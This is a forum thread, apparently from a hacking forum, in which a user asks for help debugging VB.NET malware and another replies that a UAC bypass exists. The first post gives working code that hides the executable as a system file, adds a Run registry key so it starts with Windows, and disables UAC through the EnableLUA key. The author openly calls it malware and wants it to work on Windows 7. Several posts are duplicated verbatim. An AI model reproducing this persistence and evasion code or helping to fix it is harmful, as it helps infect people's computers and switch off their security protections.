[th3l33t]

Hey guys,

I'm working on new malware in VB.NET , and I faced a big problem . I've added stealth function to the malware , using this code :

Code:

Dim filepath As String = Application.ExecutablePath
    Dim newfilepath As String = "C:\file.exe"
    Private Sub Form1_Load(ByVal sender As System.Object, ByVal e As System.EventArgs) Handles MyBase.Load
        System.IO.File.Move(filepath, newfilepath)
        System.IO.File.SetAttributes(newfilepath, IO.FileAttributes.Hidden)
         System.IO.File.SetAttributes(newfilepath, IO.FileAttributes.system)
        Shell("Reg add HKLM\Software\Microsoft\Windows\Currentversion\Run /v sys32 /d C:\file.exe /t REG_SZ /f")
        Shell("Reg add HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System /v EnableLUA /t REG_DWORD /d 0 /f", vbHidden)

the code moves the application to a new path , change it Attributes and create the above registery keys (startup & disable UAC ) . It works fine on windows xp , but under windows 7 / vista it says " access to path is denied" , so I've changed the manifest requested execution level to "requireAdministrator" , so when it's launched UAC pops out and when the user clicks yes , It will function properly and it disables UAC on the next restart . But the problem is : when the tool starts up again , it says again " access to path is denied" , in another words : It doesn't work under UAC disables machine , so how can i solve this problem ?

and thanks very much in advance .

[1llusion]

Well its simple, Microsoft is aware of this possible way of infecting users and won't let an program disable UAC.

[1llusion]

Well its simple, Microsoft is aware of this possible way of infecting users and won't let an program disable UAC.

[1llusion]

Well its simple, Microsoft is aware of this possible way of infecting users and won't let an program disable UAC.

[th3l33t]

You misunderstood the problem . The problem is : If UAC enabled , UAC will pop up when the malware is executed , thats can't be changed , but the malware will be able to disable UAC through the registry key (it works ) . When UAC is disabled, the malware should work directly without UAC permission since it's disabled , but what i get is access denied .

[th3l33t]

You misunderstood the problem . The problem is : If UAC enabled , UAC will pop up when the malware is executed , thats can't be changed , but the malware will be able to disable UAC through the registry key (it works ) . When UAC is disabled, the malware should work directly without UAC permission since it's disabled , but what i get is access denied .

[th3l33t]

You misunderstood the problem . The problem is : If UAC enabled , UAC will pop up when the malware is executed , thats can't be changed , but the malware will be able to disable UAC through the registry key (it works ) . When UAC is disabled, the malware should work directly without UAC permission since it's disabled , but what i get is access denied .

[1llusion]

You misunderstood the problem . The problem is : If UAC enabled , UAC will pop up when the malware is executed , thats can't be changed , but the malware will be able to disable UAC through the registry key (it works ) . When UAC is disabled, the malware should work directly without UAC permission since it's disabled , but what i get is access denied .

Well obviously the UAC disable doesn't work when you get that message. And there is a way to bypass UAC.

[1llusion]

You misunderstood the problem . The problem is : If UAC enabled , UAC will pop up when the malware is executed , thats can't be changed , but the malware will be able to disable UAC through the registry key (it works ) . When UAC is disabled, the malware should work directly without UAC permission since it's disabled , but what i get is access denied .

Well obviously the UAC disable doesn't work when you get that message. And there is a way to bypass UAC.

[1llusion]

You misunderstood the problem . The problem is : If UAC enabled , UAC will pop up when the malware is executed , thats can't be changed , but the malware will be able to disable UAC through the registry key (it works ) . When UAC is disabled, the malware should work directly without UAC permission since it's disabled , but what i get is access denied .

Well obviously the UAC disable doesn't work when you get that message. And there is a way to bypass UAC.